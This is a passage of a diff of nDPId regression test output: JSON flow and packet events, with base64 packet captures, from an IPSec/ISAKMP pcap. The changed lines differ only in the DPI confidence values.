{"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
-00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":184,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946749778334,"flow_last_seen":946750802633,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946750802633,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":184,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946749778420,"flow_last_seen":946750802633,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13812,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":946750802633,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":184,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946749778334,"flow_last_seen":946750802633,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946750802633,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":188,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":188,"packets-processed":187,"total-skipped-flows":0,"total-l4-payload-len":88340,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":10,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":65,"global_ts_msec":946752053636} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752053636,"flow_last_seen":946752053636,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946752053636,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946752053636,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946752053636,"pkt":"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\/W3ZXRxrm6NQH9u7KE06SIwEbersniw6hQWHyxhQ\/2rtv\/KS8MHCWu0\/UpEV6GCC8Jwl2D64n3IinW1UqpoDH3zgj5vP09DAsAYR\/lGdfNJjst9m4S0ICUVBjGwV2UlMv+ec0yUwblf\/QpdFKQAAJBN5hRLS4vKI93k9Qqglp8VdaUkpxICKhR0a7HBjyUJnKQAAHAAAQATaubyY8VWsI4Z6WQt6ODtfgtlAogAAABwAAEAFkYhaxcMPMkFLeVrj\/VCjsI8u34M="} 
-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752053636,"flow_last_seen":946752053636,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946752053636,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752053636,"flow_last_seen":946752053636,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946752053636,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":946752053657,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946752053657,"pkt":"YDjgxTWgeJS0JASgCABFAABQOHkAAPcRnkht7bvhwKgCZAH0KQQAPOJkeUX3Y1A5a1kAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAE0tZBdGn8MHoQ9Q8GZvw=="} 
01518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":946752053676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946752053676,"pkt":"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\/W3ZXRxrm6NQH9u7KE06SIwEbersniw6hQWHyxhQ\/2rtv\/KS8MHCWu0\/UpEV6GCC8Jwl2D64n3IinW1UqpoDH3zgj5vP09DAsAYR\/lGdfNJjst9m4S0ICUVBjGwV2UlMv+ec0yUwblf\/QpdFKQAAJBN5hRLS4vKI93k9Qqglp8VdaUkpxICKhR0a7HBjyUJnKQAAHAAAQATaubyY8VWsI4Z6WQt6ODtfgtlAogAAABwAAEAFkYhaxcMPMkFLeVrj\/VCjsI8u34M="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752053740,"flow_last_seen":946752053740,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946752053740,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946752053740,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946752053740,"pkt":"eJS0JASgYDjgxTWgCABFAANMWXVAAD8R8lDAqAJkbe274TikEZQDOP4KAAAAAHlF92NQOWtZRVafIANU3ed\/ICMIAAAAAQAAAywjAAMQBR\/ZJ+3X4QcdMIisXdIsU3PhwmQh1kDFx7t6\/5ZlEuSALchlMYdKNbjiP8V7XG+VkbLRJCUkt8VxzgXkbFm0XsCoZkirqFU42hH5vsNJ8atCWBsd6Czcordw7Uj1SnFPEgr9gbj8i35Q1CZjzvPpOg2XDfTj1F8Qa2ARCJGgVHZvqP1dsh1WdQDacuVxFhIR4I+JjElx\/TMSBe7XFScWmAHiyJZSR\/sug\/9l+YQ6TuHMRfMyw3KI2RT8fG+dSAP0zafR9gLQtvvjBDzYY8iKmgi7bpirCVDBD+NLJOgYQPiaGccGg43WpShhzPaY9pQwjHUv0HhPXCiIwMiS1+WDH7aKM3GJWA+QGuo6B6RhGHpiNw0\/QhMLIZssGIumxah6sniQHHyxgczJ9Xpmc9SfxoDLs71VV7DTxSj4fXQ+P3Smlay8zndK9wSEVZaDoi0x59qZOkw4MisQa\/rd0PzZ13W4DYUfc65s+3SvwSd71wWNuPF1aT6QCOgVvz0pByFSSmtoYZPXYAUypnLWpoMf\/cAZvYUtnIBaKKOpXT2Wp\/THfyvQqR9mETUY35K8\/Vul2tXwO5Das\/wKyGAsnT0j5r\/ONfK4DgoV3TQDZSER7cGwpZouqrKNneh1Yrmj8+S213d0PH8sYjZnsCspvkEKJJqU6AWTIsNOAPenF2nyLcYHITE3VXYgMt\/73R88gw\/r8iNV3wi1xnTMMbihS+I1uGhtfa7i8iGxo1WtdHjzi+uaNejNmNuKGecVIIvbgZlAtgQpZTx\/SKEyYVNnCsb+ikwOsPCilLDHACCjyogntRNIwYKpEYFr+e+\/+c8LK3xW+JXYp397K3+8CyAXrfLDr86qSPz0RnN1qca+S5OojUUkz9PSOota5KYqGrM1KJeHU5WRdFAdeqNEjUcNydZHmuf2De1ON7eXeW3RrZ6EhSMo5oNKkQFRku4BP0G0FHVUFpY\/2QZ19IbwpXjpC1raZF3g\/EOPHq48CB+DMuJ15M+r\/F2tqhqHcYi8H2Vf42h8gHHpqTmNFaPgpt0\/"} 
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752053740,"flow_last_seen":946752053740,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946752053740,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752053740,"flow_last_seen":946752053740,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946752053740,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":946752053856,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946752053856,"pkt":"YDjgxTWgeJS0JASgCABFAADsOPIAAPcRnTNt7bvhwKgCZBGUOKQA2GSxAAAAAHlF92NQOWtZRVafIANU3ecuICMgAAAAAQAAAMwkAACwbCnQO0t8tiDbRI0Dx49OEdau4d\/WY4nre6ns6n3vAP909JuZ1MJBTo0cUkWOpcHHZSiemknv+kvvcs0Xa4fyeaoZ0\/\/TyH\/qVQorUwn5KKKhNef10qbGA8IojK5T4Q9tL6LdR5DoRQd5VxvHqhklCeGrMX+Xi\/tVgDc6u4AVew+xxWga6nIJW2nxk4XW411m7qykRZck9XPKemD9+TvNlS3b9braHWj2dkZaUQ=="} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":946752054423,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946752054423,"pkt":"eJS0JASgYDjgxTWgCABFAACMWZNAAD8R9PLAqAJkbe274TikEZQAeO2UAAAAAHlF92NQOWtZRVafIANU3ecuICMIAAAAAgAAAGwwAABQJ30Fv5jPlEo6jF9WI+\/EQw5N3QovViNGDc2rMu6lmbrgZceFAAmNip6IhkJ08NB0auxPyCkplcHXICvksAjBFss5XRkKhPp+oCuvyg=="} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":206,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946749778420,"flow_last_seen":946750802633,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13812,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":946752055364,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":206,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946749778334,"flow_last_seen":946750900970,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946752055364,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":206,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946749778420,"flow_last_seen":946750802633,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13812,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":946752055364,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":206,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946749778334,"flow_last_seen":946750900970,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946752055364,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752614840,"flow_last_seen":946752614840,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946752614840,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946752614840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946752614840,"pkt":"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\/oojyv8ckOUCC9t8U9Hs8TtFSpV4V4SadeUcjl1I6R0pqQZVaDsd9TMRSFPTs\/X3XBjLj0JUR+BRdCNpv5E0zCgTJb2152j9dZb2m6ovXFIp8oTUmXYrUNXHwK3xhWMtYAlhxUiaFpdLrhis3Tnpx5vqzW\/KwvDKQAAJOo+EM5r8NdoQKu1SZOr+dnCbtz\/h3c8Wr57Ju9JT5d7KQAAHAAAQASuZzovIprPIHqf1SfYquzmSO1wuwAAABwAAEAFB2gO4vR+1eCom3VMh7fIBdvef9w="} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752614840,"flow_last_seen":946752614840,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946752614840,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752614840,"flow_last_seen":946752614840,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946752614840,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":946752614864,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946752614864,"pkt":"YDjgxTWgeJS0JASgCABFAABQ3r8AAPcR+F9t7buDwKgCZAH0KQQAPOaMk4UY8WP9qlcAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAAAAPa+lnAaTgFc15s6oA=="} 
01516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":946752614874,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946752614874,"pkt":"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\/oojyv8ckOUCC9t8U9Hs8TtFSpV4V4SadeUcjl1I6R0pqQZVaDsd9TMRSFPTs\/X3XBjLj0JUR+BRdCNpv5E0zCgTJb2152j9dZb2m6ovXFIp8oTUmXYrUNXHwK3xhWMtYAlhxUiaFpdLrhis3Tnpx5vqzW\/KwvDKQAAJOo+EM5r8NdoQKu1SZOr+dnCbtz\/h3c8Wr57Ju9JT5d7KQAAHAAAQASuZzovIprPIHqf1SfYquzmSO1wuwAAABwAAEAFB2gO4vR+1eCom3VMh7fIBdvef9w="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752614924,"flow_last_seen":946752614924,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946752614924,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946752614924,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946752614924,"pkt":"eJS0JASgYDjgxTWgCABFAANMYhRAAD8R6g\/AqAJkbe27gzikEZQDOIckAAAAAJOFGPFj\/apXtO8xDwLcetkuICMIAAAAAQAAAywjAAMQEQR4FktWGHCfTMOeDB5DCCEk1TjBbIVuH6Ow8PEQR2HAqgmEsEi91tj6w0Fl\/gqHsGTphqYxKHx374ZhXFCVCFsrbuih1wXQv\/zFKEysWV7hWx71Ib1EWGnSF6ACpmXeq9tEJQHpCTpnOEYmWAwfJZxAFG1OnNaS3S8jiMqfu8k5SURESCxQwn\/oDj44XGcb\/wH+3n\/w0ERHUrWxI7XUUx6N0bGNKKVdIreNUx1iplSJLx+XaaqzJ2CXv2t2mucULoUdiK3rY6KYRk9adCCkOCW7atCVw\/Dz1dGSbsk2vYONfcqNDLMYt2ZYhY6rXkGJ0P9dTbxkQmy\/d5ABuhXBlbDrDgBZnF3e3EIqESXWf10ABJrUTtH8fuPPsLHO6f4sY2g7aHNU8Qp6a33n577S9e0zHVnBE1rKvUNTXvQRJM9aEgiUjk8yQh1eN8M36KRgl50dSneUwheUIXt3VW6Ffa8UQQwXEqCOEwocOyh8l5apUYWbjmJmICItTdbUdshIeothNq+AaGbcmSmrgxESENFbz4+bjOazX5wNQ3jp8AD\/H\/uoUCEs7JoJvhgnns5zUqum44YuRVTjwwaury0NBMNBuu4ZgGTeGFcl7B7o6BqZGvDcAy7zwdOZ7x9FAnRlMgBSwRKy0viCxXa5bvI+7edDcnrj7KTgs8p1CIat6u5yHx7konwyUww+Q1V52uPn4XYhd1luucsOidTXgK9WEM5hw4pqV+g7jRklVxPfEc0\/Kikgnupz9puTWeX03gLFv2yHSQiL0x+LQ3XjdKX\/AnbjaxyYrCgJSZbi81\/vt5bGTcPi8Pj2T3vlfMSprOiAgGKBMtMpSv+sXHGZZcCN5+fBHupe9NPB1zmU\/lbE2gy\/ssnXeittwQpplx+hdLSgnUje\/QEleapeH1UGp\/AgtJ0vULj8bRWnmA3vZq1Y18v7z2gpAkMU7HYlsYPxb\/xN4NCGkOzFvB9rw+jFJsXMN6UUMb63VXOqMYBs5\/Tj9crfqAsUmo8Zv2MKa3377pttPhbPTZhVxiX+1mCt"} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752614924,"flow_last_seen":946752614924,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946752614924,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752614924,"flow_last_seen":946752614924,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946752614924,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946752615060,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946752615060,"pkt":"YDjgxTWgeJS0JASgCABFAADs3yQAAPcR915t7buDwKgCZBGUOKQA2NJOAAAAAJOFGPFj\/apXtO8xDwLcetkuICMgAAAAAQAAAMwkAACwpdyW7c2\/gJunZPldMG411Fh9XqpWg0EGVUCu6b4sTpdSkoNBs3\/CE4TFf8eat4rNXCNJJMOTO4t7zRLT4TmdXa92K0pHwl8LDGXFFZsrJdJPRItlhYnUch1AegTc7Y\/4aa7WDES\/4jdGVNuF2mpbAdVbrWRKvson1Aj1kzSzxGzvxugD+08NJGxTPaQqcVwY0uvTjefK3iDBSw\/nM82zQiIarpThHkv1rvf\/wg=="} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":946752615613,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946752615613,"pkt":"eJS0JASgYDjgxTWgCABFAACMYhlAAD8R7MrAqAJkbe27gzikEZQAeNh6AAAAAJOFGPFj\/apXtO8xDwLcetkuICMIAAAAAgAAAGwwAABQWFXXJkXtrzhht+gv7jZ95VEVBCnWapg+MomShlwjPicL4QCRZxMSSVMpbVw66U7T50uDB+5pmL\/W4ALVgFtUgLJsZyv4SFTwa+0OoQ=="} -00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":225,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946752053740,"flow_last_seen":946752068592,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946752616641,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed 
